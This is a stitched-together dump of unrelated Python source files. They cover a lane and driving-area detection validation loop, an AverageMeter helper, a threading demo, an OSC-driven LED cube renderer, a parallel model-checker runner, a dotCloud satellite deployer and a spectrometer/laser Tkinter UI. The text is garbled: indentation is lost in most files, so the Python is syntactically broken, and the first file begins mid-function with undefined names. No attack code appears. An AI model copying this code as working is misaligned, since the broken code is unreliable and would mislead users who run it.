save_conf=False # save auto-label confidences
verbose=False
save_hybrid=False
log_imgs,wandb = min(16,100), None
nc = 10
iouv = torch.linspace(0.5,0.95,10).to(device) #iou vector for mAP@0.5:0.95
niou = iouv.numel()
try:
import wandb
except ImportError:
wandb = None
log_imgs = 0
seen = 0
confusion_matrix = ConfusionMatrix(nc=model.nc) #detector confusion matrix
da_metric = SegmentationMetric(config.num_seg_class) #segment confusion matrix
ll_metric = SegmentationMetric(2) #segment confusion matrix
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
colors = [[random.randint(0, 255) for _ in range(3)] for _ in names]
coco91class = coco80_to_coco91_class()
s = ('%20s' + '%12s' * 6) % ('Class', 'Images', 'Targets', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t_inf, t_nms = 0., 0., 0., 0., 0., 0., 0., 0., 0.
losses = AverageMeter()
da_acc_seg = AverageMeter()
da_IoU_seg = AverageMeter()
da_mIoU_seg = AverageMeter()
ll_acc_seg = AverageMeter()
ll_IoU_seg = AverageMeter()
ll_mIoU_seg = AverageMeter()
T_inf = AverageMeter()
T_nms = AverageMeter()
# switch to train mode
model.eval()
jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
for batch_i, (img, target, paths, shapes) in tqdm(enumerate(val_loader), total=len(val_loader)):
if not config.DEBUG:
img = img.to(device, non_blocking=True)
assign_target = []
for tgt in target:
assign_target.append(tgt.to(device))
target = assign_target
nb, _, height, width = img.shape #batch size, channel, height, width
with torch.no_grad():
pad_w, pad_h = shapes[0][1][1]
pad_w = int(pad_w)
pad_h = int(pad_h)
ratio = shapes[0][1][0][0]
t = time_synchronized()
det_out, da_seg_out, ll_seg_out= model(img)
t_inf = time_synchronized() - t
if batch_i > 0:
T_inf.update(t_inf/img.size(0),img.size(0))
inf_out,train_out = det_out
#driving area segment evaluation
_,da_predict=torch.max(da_seg_out, 1)
_,da_gt=torch.max(target[1], 1)
da_predict = da_predict[:, pad_h:height-pad_h, pad_w:width-pad_w]
da_gt = da_gt[:, pad_h:height-pad_h, pad_w:width-pad_w]
da_metric.reset()
da_metric.addBatch(da_predict.cpu(), da_gt.cpu())
da_acc = da_metric.pixelAccuracy()
da_IoU = da_metric.IntersectionOverUnion()
da_mIoU = da_metric.meanIntersectionOverUnion()
da_acc_seg.update(da_acc,img.size(0))
da_IoU_seg.update(da_IoU,img.size(0))
da_mIoU_seg.update(da_mIoU,img.size(0))
#lane line segment evaluation
_,ll_predict=torch.max(ll_seg_out, 1)
_,ll_gt=torch.max(target[2], 1)
ll_predict = ll_predict[:, pad_h:height-pad_h, pad_w:width-pad_w]
ll_gt = ll_gt[:, pad_h:height-pad_h, pad_w:width-pad_w]
ll_metric.reset()
ll_metric.addBatch(ll_predict.cpu(), ll_gt.cpu())
ll_acc = ll_metric.lineAccuracy()
ll_IoU = ll_metric.IntersectionOverUnion()
ll_mIoU = ll_metric.meanIntersectionOverUnion()
ll_acc_seg.update(ll_acc,img.size(0))
ll_IoU_seg.update(ll_IoU,img.size(0))
ll_mIoU_seg.update(ll_mIoU,img.size(0))
total_loss, head_losses = criterion((train_out,da_seg_out, ll_seg_out), target, shapes,model) #Compute loss
losses.update(total_loss.item(), img.size(0))
#NMS
t = time_synchronized()
target[0][:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [target[0][target[0][:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
output = non_max_suppression(inf_out, conf_thres= config.TEST.NMS_CONF_THRESHOLD, iou_thres=config.TEST.NMS_IOU_THRESHOLD, labels=lb)
#output = non_max_suppression(inf_out, conf_thres=0.001, iou_thres=0.6)
#output = non_max_suppression(inf_out, conf_thres=config.TEST.NMS_CONF_THRES, iou_thres=config.TEST.NMS_IOU_THRES)
t_nms = time_synchronized() - t
if batch_i > 0:
T_nms.update(t_nms/img.size(0),img.size(0))
if config.TEST.PLOTS:
if batch_i == 0:
for i in range(test_batch_size):
img_test = cv2.imread(paths[i])
da_seg_mask = da_seg_out[i][:, pad_h:height-pad_h, pad_w:width-pad_w].unsqueeze(0)
da_seg_mask = torch.nn.functional.interpolate(da_seg_mask, scale_factor=int(1/ratio), mode='bilinear')
_, da_seg_mask = torch.max(da_seg_mask, 1)
da_gt_mask = target[1][i][:, pad_h:height-pad_h, pad_w:width-pad_w].unsqueeze(0)
da_gt_mask = torch.nn.functional.interpolate(da_gt_mask, scale_factor=int(1/ratio), mode='bilinear')
_, da_gt_mask = torch.max(da_gt_mask, 1)
da_seg_mask = da_seg_mask.int().squeeze().cpu().numpy()
da_gt_mask = da_gt_mask.int().squeeze().cpu().numpy()
# seg_mask = seg_mask > 0.5
# plot_img_and_mask(img_test, seg_mask, i,epoch,save_dir)
img_test1 = img_test.copy()
_ = show_seg_result(img_test, da_seg_mask, i,epoch,save_dir)
_ = show_seg_result(img_test1, da_gt_mask, i, epoch, save_dir, is_gt=True)
img_ll = cv2.imread(paths[i])
ll_seg_mask = ll_seg_out[i][:, pad_h:height-pad_h, pad_w:width-pad_w].unsqueeze(0)
ll_seg_mask = torch.nn.functional.interpolate(ll_seg_mask, scale_factor=int(1/ratio), mode='bilinear')
_, ll_seg_mask = torch.max(ll_seg_mask, 1)
ll_gt_mask = target[2][i][:, pad_h:height-pad_h, pad_w:width-pad_w].unsqueeze(0)
ll_gt_mask = torch.nn.functional.interpolate(ll_gt_mask, scale_factor=int(1/ratio), mode='bilinear')
_, ll_gt_mask = torch.max(ll_gt_mask, 1)
ll_seg_mask = ll_seg_mask.int().squeeze().cpu().numpy()
ll_gt_mask = ll_gt_mask.int().squeeze().cpu().numpy()
# seg_mask = seg_mask > 0.5
# plot_img_and_mask(img_test, seg_mask, i,epoch,save_dir)
img_ll1 = img_ll.copy()
_ = show_seg_result(img_ll, ll_seg_mask, i,epoch,save_dir, is_ll=True)
_ = show_seg_result(img_ll1, ll_gt_mask, i, epoch, save_dir, is_ll=True, is_gt=True)
img_det = cv2.imread(paths[i])
img_gt = img_det.copy()
det = output[i].clone()
if len(det):
det[:,:4] = scale_coords(img[i].shape[1:],det[:,:4],img_det.shape).round()
for *xyxy,conf,cls in reversed(det):
#print(cls)
label_det_pred = f'{names[int(cls)]} {conf:.2f}'
plot_one_box(xyxy, img_det , label=label_det_pred, color=colors[int(cls)], line_thickness=3)
cv2.imwrite(save_dir+"/batch_{}_{}_det_pred.png".format(epoch,i),img_det)
labels = target[0][target[0][:, 0] == i, 1:]
# print(labels)
labels[:,1:5]=xywh2xyxy(labels[:,1:5])
if len(labels):
labels[:,1:5]=scale_coords(img[i].shape[1:],labels[:,1:5],img_gt.shape).round()
for cls,x1,y1,x2,y2 in labels:
#print(names)
#print(cls)
label_det_gt = f'{names[int(cls)]}'
xyxy = (x1,y1,x2,y2)
plot_one_box(xyxy, img_gt , label=label_det_gt, color=colors[int(cls)], line_thickness=3)
cv2.imwrite(save_dir+"/batch_{}_{}_det_gt.png".format(epoch,i),img_gt)
# Statistics per image
# output([xyxy,conf,cls])
# target[0] ([img_id,cls,xyxy])
for si, pred in enumerate(output):
labels = target[0][target[0][:, 0] == si, 1:] #all object in one image
nl = len(labels) # num of object
tcls = labels[:, 0].tolist() if nl else [] # target class
path = Path(paths[si])
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred
# Append to text file
if config.TEST.SAVE_TXT:
gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
# W&B logging
if config.TEST.PLOTS and len(wandb_images) < log_imgs:
box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
"class_id": int(cls),
"box_caption": "%s %.3f" % (names[cls], conf),
"scores": {"class_score": conf},
"domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space
wandb_images.append(wandb.Image(img[si], boxes=boxes, caption=path.name))
# Append to pycocotools JSON dictionary
if config.TEST.SAVE_JSON:
# [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(pred.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
# Assign all predictions as incorrect
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
if nl:
detected = [] # target indices
tcls_tensor = labels[:, 0]
# target boxes
tbox = xywh2xyxy(labels[:, 1:5])
scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels
if config.TEST.PLOTS:
confusion_matrix.process_batch(pred, torch.cat((labels[:, 0:1], tbox), 1))
# Per target class
for cls in torch.unique(tcls_tensor):
ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # prediction indices
pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # target indices
# Search for detections
if pi.shape[0]:
# Prediction to target ious
# n*m n:pred m:label
ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices
# Append detections
detected_set = set()
for j in (ious > iouv[0]).nonzero(as_tuple=False):
d = ti[i[j]] # detected target
if d.item() not in detected_set:
detected_set.add(d.item())
detected.append(d)
correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
if len(detected) == nl: # all targets already located in image
break
# Append statistics (correct, conf, pcls, tcls)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))
if config.TEST.PLOTS and batch_i < 3:
f = save_dir +'/'+ f'test_batch{batch_i}_labels.jpg' # labels
#Thread(target=plot_images, args=(img, target[0], paths, f, names), daemon=True).start()
f = save_dir +'/'+ f'test_batch{batch_i}_pred.jpg' # predictions
#Thread(target=plot_images, args=(img, output_to_target(output), paths, f, names), daemon=True).start()
# Compute statistics
# stats : [[all_img_correct]...[all_img_tcls]]
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy zip(*) :unzip
map70 = None
map75 = None
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=False, save_dir=save_dir, names=names)
ap50, ap70, ap75,ap = ap[:, 0], ap[:,4], ap[:,5],ap.mean(1) # [P, R, AP@0.5, AP@0.5:0.95]
mp, mr, map50, map70, map75, map = p.mean(), r.mean(), ap50.mean(), ap70.mean(),ap75.mean(),ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%12.3g' * 6 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
#print(map70)
#print(map75)
# Print results per class
if (verbose or (nc <= 20 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t_inf, t_nms, t_inf + t_nms)) + (imgsz, imgsz, batch_size) # tuple
if not training:
print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t)
# Plots
if config.TEST.PLOTS:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
if wandb and wandb.run:
wandb.log({"Images": wandb_images})
wandb.log({"Validation": [wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]})
# Save JSON
if config.TEST.SAVE_JSON and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = '../coco/annotations/instances_val2017.json' # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in val_loader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if config.TEST.SAVE_TXT else ''
print(f"Results saved to {save_dir}{s}")
model.float() # for training
maps = np.zeros(nc) + map
# for i, c in enumerate(ap_class):
# maps[c] = ap[i]
da_segment_result = (da_acc_seg.avg,da_IoU_seg.avg,da_mIoU_seg.avg)
ll_segment_result = (ll_acc_seg.avg,ll_IoU_seg.avg,ll_mIoU_seg.avg)
# print(da_segment_result)
# print(ll_segment_result)
detect_result = np.asarray([mp, mr, map50, map])
# print('mp:{},mr:{},map50:{},map:{}'.format(mp, mr, map50, map))
#print segmet_result
t = [T_inf.avg, T_nms.avg]
return da_segment_result, ll_segment_result, detect_result, losses.avg, maps, t
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count if self.count != 0 else 0
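# --- Illustrative usage (not part of the original module) --------------------
# AverageMeter keeps a running average weighted by batch size: update(value, n)
# adds value*n to the sum and n to the count. A quick example with made-up
# loss values:
if __name__ == '__main__':
    meter = AverageMeter()
    meter.update(0.9, n=4)                  # batch of 4 samples, mean loss 0.9
    meter.update(0.5, n=8)                  # batch of 8 samples, mean loss 0.5
    print(meter.val, round(meter.avg, 4))   # 0.5 0.6333  (= (0.9*4 + 0.5*8) / 12)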
|
multi-threading_test.py
|
from threading import Thread
import time
def timer(name, delay, repeat):
print "Timer: " + name + " Started"
while repeat > 0:
time.sleep(delay)
print name + ": " + str(time.ctime(time.time()))
repeat -= 1
print "Timer: " + name + " Completed"
def Main():
t1 = Thread(target=timer, args=("Timer1", 1, 5))
t2 = Thread(target=timer, args=("Timer2", 2, 5))
t1.start()
t2.start()
print "main is done"
if __name__ == '__main__':
Main()
|
cube.py
|
import argparse
import asyncio
import logging
from queue import Queue
import signal
import sys
import threading
import traceback
import uvloop
from biofeedback_cube.buffer import buffer
from biofeedback_cube import config
from biofeedback_cube import display
from biofeedback_cube import exceptions
from biofeedback_cube import osc
from biofeedback_cube import utils
from biofeedback_cube.hydra import hydra, save_hydra
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
queue = Queue(maxsize=2)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--host", default="0.0.0.0", help="The ip to listen on")
parser.add_argument("--port", type=int, default=37339, help="The port to listen on")
parser.add_argument("--simulator", action='store_true', help="run simulator")
parser.add_argument("--verbose", action='store_true', help="verbose")
args = parser.parse_args()
return args
@asyncio.coroutine
def main_loop(coros):
done, _pending = yield from asyncio.wait(coros, return_when=asyncio.FIRST_COMPLETED)
for t in done:
print(f'{t} is done')
shutdown = hydra.shutdown
save_hydra()
if shutdown:
utils.shutdown()
if t.exception():
traceback_str = ''.join(traceback.format_tb(t.exception().__traceback__))
logger.critical(traceback_str)
sys.exit(-1)
def render():
try:
buffer.update()
return buffer.buffer
except exceptions.UserQuit:
logger.warning('user quit')
save_hydra()
raise
except Exception:
logger.exception('whoops 🙀')
raise
@asyncio.coroutine
def async_render():
while True:
if hydra.shutdown:
logger.warning('hydra shutdown, exiting render loop')
break
grid = render()
brightness = hydra.e
display.draw(grid, brightness=brightness)
yield from asyncio.sleep(0.010)
def async_main(args):
coros = (
async_render(),
osc.async_server(args.host, args.port),
)
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
loop = asyncio.get_event_loop()
loop.run_until_complete(main_loop(coros))
def thread_render():
while True:
grid = render()
queue.put(grid.copy())
def thread_draw():
while True:
logger.debug(f'{queue.qsize()}')
grid = queue.get()
display.draw(grid)
def thread_main(args):
t1 = threading.Thread(target=thread_render, daemon=True)
t2 = threading.Thread(target=osc.server, args=(args.host, args.port), daemon=True)
t1.start()
t2.start()
thread_draw()
def sigterm_handler(signum, frame):
logger.warning('caught SIGTERM')
save_hydra()
sys.exit(0)
def main():
args = parse_args()
signal.signal(signal.SIGTERM, sigterm_handler)
if args.verbose:
root_logger = logging.getLogger()
root_logger.setLevel(logging.DEBUG)
logger.setLevel(logging.DEBUG)
osc.init()
display.init(config.HEIGHT, config.WIDTH, sdl=args.simulator)
# thread_main(args)
async_main(args)
if __name__ == '__main__':
main()
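# --- Illustrative sketch (not part of the original module) -------------------
# thread_main() above is a bounded producer/consumer: thread_render() puts
# frames into Queue(maxsize=2), so the renderer can never run more than two
# frames ahead of the display, and thread_draw() blocks on queue.get(). The
# self-contained demo below shows the same back-pressure idea with integers.
def _queue_backpressure_demo(n=5):
    import queue
    import threading

    q = queue.Queue(maxsize=2)
    out = []

    def producer():
        for i in range(n):
            q.put(i)        # blocks once two items are waiting (back-pressure)
        q.put(None)         # sentinel: tell the consumer to stop

    def consumer():
        while True:
            item = q.get()
            if item is None:
                break
            out.append(item)

    threads = [threading.Thread(target=producer), threading.Thread(target=consumer)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return out              # -> [0, 1, 2, 3, 4]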
|
threadwatcher_parallel_cosa2.py
|
#!/usr/bin/env python3
import argparse
import signal
import subprocess
import sys
import time
import os
## Non-blocking reads for subprocess
## https://stackoverflow.com/questions/375427/non-blocking-read-on-a-subprocess-pipe-in-python
import sys
from subprocess import PIPE, Popen
from threading import Thread
ON_POSIX = 'posix' in sys.builtin_module_names
def enqueue_output(out, l):
for line in iter(out.readline, b''):
l.append(line.decode('utf-8'))
# out.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Run BMC and K-induction in parallel")
parser.add_argument('btor_file')
parser.add_argument('-k', '--bound', default='1000', help='The maximum bound to unroll to')
parser.add_argument('-v', '--verbosity', action="store_true", help="Enable verbose output."
" Note: this is buffered and only prints when a process finishes"
" or there is an interrupt")
args = parser.parse_args()
btor_file = args.btor_file
bound = args.bound
verbosity = args.verbosity
verbosity_option = '1' if args.verbosity else '0'
commands = {
"BMC": ['./pono-btor-msat', '-e', 'bmc', '-v', verbosity_option, '-k', bound, btor_file],
"BMC+SimplePath": ['./pono-btor-msat', '-e', 'bmc-sp', '-v', verbosity_option, '-k', bound, btor_file],
"K-Induction": ['./pono-btor-msat', '-e', 'ind', '-v', verbosity_option, '-k', bound, btor_file],
"Interpolant-based": ['./pono-btor-msat', '-e', 'interp', '-v', verbosity_option, '-k', bound, btor_file]
}
interp_processes = set()
all_processes = []
queues = {}
name_map = {}
# this one gets updated on the fly as processes end
processes = []
for name, cmd in commands.items():
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, close_fds=ON_POSIX)
if 'interp' in cmd:
interp_processes.add(proc)
processes.append(proc)
all_processes.append(proc)
name_map[proc] = name
# instantiate watcher thread
q = []
t = Thread(target=enqueue_output, args=(proc.stdout, q))
queues[proc] = q
t.daemon = True
t.start()
def print_process_output(proc):
for line in queues[proc]:
print(line, end='')
print()
sys.stdout.flush()
shutdown = False
def handle_signal(signum, frame):
# pass the received signal on to the subprocesses
global shutdown
if not shutdown:
shutdown = True
for proc in processes:
if proc.poll() is None:
proc.terminate()
global verbosity
if verbosity:
# too slow to communicate with process in signal handling
# use cached lines
for proc in all_processes:
print("{} output:".format(name_map[proc]))
for line in queues[proc]:
print(line, end='')
print()
sys.stdout.flush()
sys.exit(0)
signal.signal(signal.SIGINT, handle_signal)
signal.signal(signal.SIGTERM, handle_signal)
while not shutdown:
for p in processes:
if p.poll() is not None:
# return code for unknown is 2
# anything higher than that is an error
# keep solving unless there are no more running processes
if p.returncode >= 2:
processes.remove(p)
# print unknown only if this is the last process
if not processes:
print_process_output(p)
shutdown = True
else:
# HACK don't return counter-examples from interpolation-based procedure
# mathsat might return constant arrays in witness which can't be
# printed in btor2 format
if p in interp_processes and p.returncode == 1:
processes.remove(p)
# this shouldn't happen but let's handle it just in case
if not processes:
print_process_output(p)
shutdown = True
break
else:
print_process_output(p)
shutdown = True
break
# just a double check
if not processes:
shutdown = True
break
if not shutdown:
time.sleep(.001)
# clean up
for p in all_processes:
if p.poll() is None:
p.terminate()
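# --- Illustrative sketch (not part of the original script) -------------------
# The script above avoids blocking on subprocess output by giving each process
# a daemon thread that drains proc.stdout into a plain list (enqueue_output),
# so the main loop can poll return codes freely and print the cached lines
# later. The helper below shows the same reader-thread idea against a trivial
# child process that echoes a single line; it reuses the enqueue_output helper
# defined at the top of this file.
def _drain_subprocess_demo():
    lines = []
    proc = Popen([sys.executable, '-c', "print('hello from child')"],
                 stdout=PIPE, close_fds=ON_POSIX)
    reader = Thread(target=enqueue_output, args=(proc.stdout, lines))
    reader.daemon = True
    reader.start()
    proc.wait()             # the main thread stays free to poll or do other work
    reader.join(timeout=1.0)
    return lines            # -> ['hello from child\n']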
|
cloud.py
|
"""Cloud satellite manager
Here we use dotcloud to lookup or deploy the satellite server. This also
means we need dotcloud credentials, so we get those if we need them.
Most of this functionality is pulled from the dotcloud client, but is
modified and organized to meet our needs. This is why we pass around and
work with a cli object. This is the CLI object from the dotcloud client.
"""
import time
import os
import os.path
import socket
import sys
import subprocess
import threading
from StringIO import StringIO
import dotcloud.ui.cli
from dotcloud.ui.config import GlobalConfig, CLIENT_KEY, CLIENT_SECRET
from dotcloud.client import RESTClient
from dotcloud.client.auth import NullAuth
from dotcloud.client.errors import RESTAPIError
from skypipe import client
APPNAME = "skypipe0"
satellite_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'satellite')
# This is a monkey patch to silence rsync output
class FakeSubprocess(object):
@staticmethod
def call(*args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
return subprocess.call(*args, **kwargs)
dotcloud.ui.cli.subprocess = FakeSubprocess
def wait_for(text, finish=None, io=None):
"""Displays dots until returned event is set"""
if finish:
finish.set()
time.sleep(0.1) # threads, sigh
if not io:
io = sys.stdout
finish = threading.Event()
io.write(text)
def _wait():
while not finish.is_set():
io.write('.')
io.flush()
finish.wait(timeout=1)
io.write('\n')
threading.Thread(target=_wait).start()
return finish
def lookup_endpoint(cli):
"""Looks up the application endpoint from dotcloud"""
url = '/applications/{0}/environment'.format(APPNAME)
environ = cli.user.get(url).item
port = environ['DOTCLOUD_SATELLITE_ZMQ_PORT']
host = socket.gethostbyname(environ['DOTCLOUD_SATELLITE_ZMQ_HOST'])
return "tcp://{0}:{1}".format(host, port)
def setup_dotcloud_account(cli):
"""Gets user/pass for dotcloud, performs auth, and stores keys"""
client = RESTClient(endpoint=cli.client.endpoint)
client.authenticator = NullAuth()
urlmap = client.get('/auth/discovery').item
username = cli.prompt('dotCloud email')
password = cli.prompt('Password', noecho=True)
credential = {'token_url': urlmap.get('token'),
'key': CLIENT_KEY, 'secret': CLIENT_SECRET}
try:
token = cli.authorize_client(urlmap.get('token'), credential, username, password)
except Exception as e:
cli.die('Username and password do not match. Try again.')
token['url'] = credential['token_url']
config = GlobalConfig()
config.data = {'token': token}
config.save()
cli.global_config = GlobalConfig() # reload
cli.setup_auth()
cli.get_keys()
def setup(cli):
"""Everything to make skypipe ready to use"""
if not cli.global_config.loaded:
setup_dotcloud_account(cli)
discover_satellite(cli)
cli.success("Skypipe is ready for action")
def discover_satellite(cli, deploy=True, timeout=5):
"""Looks to make sure a satellite exists, returns endpoint
First makes sure we have dotcloud account credentials. Then it looks
up the environment for the satellite app. This will contain host and
port to construct an endpoint. However, if app doesn't exist, or
endpoint does not check out, we call `launch_satellite` to deploy,
which calls `discover_satellite` again when finished. Ultimately we
return a working endpoint. If deploy is False it will not try to
deploy.
"""
if not cli.global_config.loaded:
cli.die("Please setup skypipe by running `skypipe --setup`")
try:
endpoint = lookup_endpoint(cli)
ok = client.check_skypipe_endpoint(endpoint, timeout)
if ok:
return endpoint
else:
return launch_satellite(cli) if deploy else None
except (RESTAPIError, KeyError):
return launch_satellite(cli) if deploy else None
def destroy_satellite(cli):
url = '/applications/{0}'.format(APPNAME)
try:
res = cli.user.delete(url)
except RESTAPIError:
pass
def launch_satellite(cli):
"""Deploys a new satellite app over any existing app"""
cli.info("Launching skypipe satellite:")
finish = wait_for(" Pushing to dotCloud")
# destroy any existing satellite
destroy_satellite(cli)
# create new satellite app
url = '/applications'
try:
cli.user.post(url, {
'name': APPNAME,
'flavor': 'sandbox'
})
except RESTAPIError as e:
if e.code == 409:
cli.die('Application "{0}" already exists.'.format(APPNAME))
else:
cli.die('Creating application "{0}" failed: {1}'.format(APPNAME, e))
class args: application = APPNAME
#cli._connect(args)
# push satellite code
protocol = 'rsync'
url = '/applications/{0}/push-endpoints{1}'.format(APPNAME, '')
endpoint = cli._select_endpoint(cli.user.get(url).items, protocol)
class args: path = satellite_path
cli.push_with_rsync(args, endpoint)
# tell dotcloud to deploy, then wait for it to finish
revision = None
clean = False
url = '/applications/{0}/deployments'.format(APPNAME)
response = cli.user.post(url, {'revision': revision, 'clean': clean})
deploy_trace_id = response.trace_id
deploy_id = response.item['deploy_id']
original_stdout = sys.stdout
finish = wait_for(" Waiting for deployment", finish, original_stdout)
try:
sys.stdout = StringIO()
res = cli._stream_deploy_logs(APPNAME, deploy_id,
deploy_trace_id=deploy_trace_id, follow=True)
if res != 0:
return res
except KeyboardInterrupt:
cli.error('You\'ve closed your log stream with Ctrl-C, ' \
'but the deployment is still running in the background.')
cli.error('If you aborted because of an error ' \
'(e.g. the deployment got stuck), please e-mail\n' \
'support@dotcloud.com and mention this trace ID: {0}'
.format(deploy_trace_id))
cli.error('If you want to continue following your deployment, ' \
'try:\n{0}'.format(
cli._fmt_deploy_logs_command(deploy_id)))
cli.die()
except RuntimeError:
# workaround for a bug in the current dotcloud client code
pass
finally:
sys.stdout = original_stdout
finish = wait_for(" Satellite coming online", finish)
endpoint = lookup_endpoint(cli)
ok = client.check_skypipe_endpoint(endpoint, 120)
finish.set()
time.sleep(0.1) # sigh, threads
if ok:
return endpoint
else:
cli.die("Satellite failed to come online")
|
core_ui.py
|
import tkinter as tk
from tkinter import messagebox
from tkinter import filedialog
import seabreeze
from seabreeze.spectrometers import Spectrometer
import matplotlib.pyplot as plt
import matplotlib
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import laser_control
import random
import pandas as pd
import numpy as np
import threading
import time
import interface_config
if interface_config.ON_BBB:
import Adafruit_BBIO.GPIO as GPIO # Adafruit library for safe GPIO control
else:
from debug import DummyGPIO as GPIO
from testing_utils import generate_dummy_spectra
# laser = laser_control.Laser()
root = tk.Tk()
root.resizable(0, 0)
root.title("Spectrometer Tool")
matplotlib.use("TkAgg")
device_name = tk.StringVar()
device_name.set('No Device Detected')
int_time_entry = tk.StringVar()
int_time_entry.set("100000")
int_time = int(1E5) # default integration time = 100000 us (100 ms)
trigger_mode_entry = tk.StringVar()
trigger_mode_entry.set('0')
trigger_mode = 0
collect_control = True # enable collection controls
sample_control = True # enable sampling controls
test_mode = False # activate test mode
spec = None
spec_range = None
spec_intensity = None
max_intensity_var = tk.StringVar()
max_intensity_var.set('N/A')
integration_limits_var = tk.StringVar()
integration_limits_var.set('N/A')
pixel_var = tk.StringVar()
pixel_var.set('N/A')
sample_var = tk.StringVar()
sample_var.set('N/A')
dark_count_var = tk.IntVar()
dark_count_var.set(0)
sync_fire_var = tk.IntVar()
sync_fire_var.set(0)
devices = seabreeze.spectrometers.list_devices()
# laser control variables
pulse_options = {'Continuous', 'Single Shot', 'Burst'}
pulse_mode = tk.StringVar()
pulse_mode.set('Continuous')
rep_rate_control = tk.StringVar()
rep_rate_control.set('10')
resonator_temp_var = tk.StringVar()
resonator_temp_var.set('N/A')
power_options = {'Manual', 'Low Power', 'High Power'}
power_mode = tk.StringVar()
power_mode.set('Manual')
burst_count_var = tk.StringVar()
burst_count_var.set('1000')
diode_current_var = tk.StringVar()
diode_current_var.set(0.1)
diode_current_measurement_var = tk.StringVar()
diode_current_measurement_var.set('N/A')
pulse_width_var = tk.StringVar()
pulse_width_var.set('10')
diode_trigger_options = {'Internal', 'External'}
diode_trigger_var = tk.StringVar()
diode_trigger_var.set('Internal')
# laser status vars
status_var = tk.StringVar()
status_var.set('N/A')
fet_temp_var = tk.StringVar()
fet_temp_var.set('N/A')
bank_voltage_var = tk.StringVar()
bank_voltage_var.set('N/A')
safety_control = tk.IntVar()
safety_control.set(0)
bank_target_var = tk.StringVar()
bank_target_var.set('N/A')
fet_voltage_var = tk.StringVar()
fet_voltage_var.set('N/A')
fet_drop_var = tk.StringVar()
fet_drop_var.set('N/A')
fet_src_var = tk.StringVar()
fet_src_var.set('N/A')
fig = plt.Figure(figsize=(5, 5), dpi=100)
spectra_plot = fig.add_subplot(111)
spectra_plot.set_ylabel('Intensity')
spectra_plot.set_xlabel('Wavelength [nm]')
